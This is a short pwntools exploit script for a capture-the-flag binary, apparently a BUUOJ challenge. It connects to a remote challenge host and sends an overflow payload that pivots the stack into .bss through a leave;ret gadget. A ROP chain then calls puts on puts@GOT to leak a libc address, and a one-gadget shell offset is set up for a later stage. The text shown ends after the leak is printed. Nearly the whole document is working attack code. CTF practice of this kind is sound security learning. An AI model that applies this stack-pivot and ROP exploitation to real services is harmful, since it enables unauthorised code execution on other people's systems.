from pwn import * from LibcSearcher import * #p=process('./pwn') p=remote('node5.buuoj.cn',25450) elf=ELF('./pwn') context(log_level='debug') leave_ret=0x400699 pop_rdi=0x0000000000400703 bss=0x601080 ret=0x4004c9 libc=ELF('./libc-2.23.so')
shell=0x4526a
main = elf.sym["main"] puts_plt= elf.plt["puts"] puts_got = elf.got["puts"] #gdb.attach(p) pause()
payload=b'a'*0x60+p64(bss)+p64(leave_ret)
p.send(payload)
payload2=p64(ret)*28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main) p.send(payload2) p.recvuntil(b'Done!You can check and use your borrow stack now!\n') leak_addr = u64(p.recv(6)+b'\x00\x00') print(hex(leak_addr))